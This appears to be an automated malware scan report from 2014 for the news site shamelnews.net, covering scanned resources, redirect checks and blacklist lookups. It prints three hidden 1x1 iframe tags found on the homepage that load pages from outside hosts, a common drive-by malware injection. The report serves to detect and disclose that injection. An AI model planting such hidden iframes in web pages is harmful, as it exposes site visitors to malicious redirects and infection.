Scanned pages/files
Request | Server response | Status |
http://shamelnews.net/ | 200 OK Content-Length: 27277 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 1x1 src: http://unohtui.californiaspurs.com/d7e9vm7tpg <iframe src="http://unohtui.californiaspurs.com/d7e9vm7tpg" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://news.adsabouts.ir/go.php <iframe src="http://news.adsabouts.ir/go.php" width="1" height="1"> Hidden iFrame found. size: 1x1 src: http://news.adsabouts.ir/rotator/scripts/wow.html <iframe src="http://news.adsabouts.ir/rotator/scripts/wow.html" width="1" height="1"> | ||
http://code.jquery.com/jquery-2.0.3.min.js | 200 OK Content-Length: 83612 Content-Type: application/x-javascript | clean |
http://shamelnews.net/scripts/jquery.timers.1.2.js | 200 OK Content-Length: 3067 Content-Type: application/javascript | clean |
http://shamelnews.net/Scripts/jquery.galleryview.2.1.1.min.js | 200 OK Content-Length: 16994 Content-Type: application/javascript | clean |
http://shamelnews.net/WebResource.axd?d=937tpQAMUST7AfBzdzJ4S1O45GvxOcjmcMSg6H2TN2lU8x0gBXzfS4XDehwHQGpl-uhP401gRaE_-yiN1tYwrvU38VHHqpfG_5yUx4Y0DnQ1&t=635332440160000000 | 200 OK Content-Length: 22346 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21347 Content-Type: text/javascript | clean |
http://shamelnews.net/style-demo.html | 200 OK Content-Length: 15236 Content-Type: text/html | clean |
http://shamelnews.net/index.html | 404 Not Found Content-Length: 0 | clean |
http://shamelnews.net/test404page.js | 404 Not Found Content-Length: 0 | clean |
http://shamelnews.net/full-width.html | 404 Not Found Content-Length: 0 | clean |
http://shamelnews.net/flight.aspx | 200 OK Content-Length: 12926 Content-Type: text/html | clean |
http://shamelnews.net/ScriptResource.axd?d=hEbp_iSLqyOIc0lWliNIHtb2GDAWSozchBV7RnPf33g3NzD2O4FJwzymztM3VNOnqjsiFfcZ-b-SlfNmx4lX0UVa27QpHedDqNpQn-FwQaUB6KSiqlvKBNLSL23lXX83qQHvt4YFf_RFSyvELbeq0g2&t=3a1336b1 | 200 OK Content-Length: 300324 Content-Type: application/x-javascript | clean |
http://shamelnews.net/ScriptResource.axd?d=cs4DgHDFkEVWLpFyZQmNl3d5lyTUrN-opYMOOsS2s33SCnHCSPb3n0tFwzz2hKYbetHokfs81Q1MaTTHV4C6-0uPtXAExI6PdoC_5aXpRwfw_uCs7aGoWUNI5R02Lp3cBDJmBZ5F6QbwoS5gS73FHw2&t=3a1336b1 | 200 OK Content-Length: 95637 Content-Type: application/x-javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 6875 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shamelnews.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Wed, 10 Sep 2014 08:45:34 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
Content-Length: 27277
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: .ASPXANONYMOUS=wodHbGUD0AEkAAAAODkyOGI2ZDUtZmVlNy00ZjBjLWJkNzQtMTY5OWVhMjkxOTY5WJoD1DGj9AxtHtXWP0_3X_hMpskiNmgB2S43ivVFjCI1; expires=Tue, 18-Nov-2014 19:25:33 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gm2t341tpzdqdkgpcdh5kzia; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...27277 bytes of data.
GET / HTTP/1.1
Host: shamelnews.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Wed, 10 Sep 2014 08:45:34 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
Content-Length: 27277
Content-Type: text/html; charset=utf-8
Expires: -1
Set-Cookie: .ASPXANONYMOUS=wodHbGUD0AEkAAAAODkyOGI2ZDUtZmVlNy00ZjBjLWJkNzQtMTY5OWVhMjkxOTY5WJoD1DGj9AxtHtXWP0_3X_hMpskiNmgB2S43ivVFjCI1; expires=Tue, 18-Nov-2014 19:25:33 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=gm2t341tpzdqdkgpcdh5kzia; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...27277 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: shamelnews.net
Referer: http://www.google.com/search?q=shamelnews.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shamelnews.net
Referer: http://www.google.com/search?q=shamelnews.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shamelnews.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://shamelnews.net/
Result: shamelnews.net is not infected or malware details are not published yet.
Result: shamelnews.net is not infected or malware details are not published yet.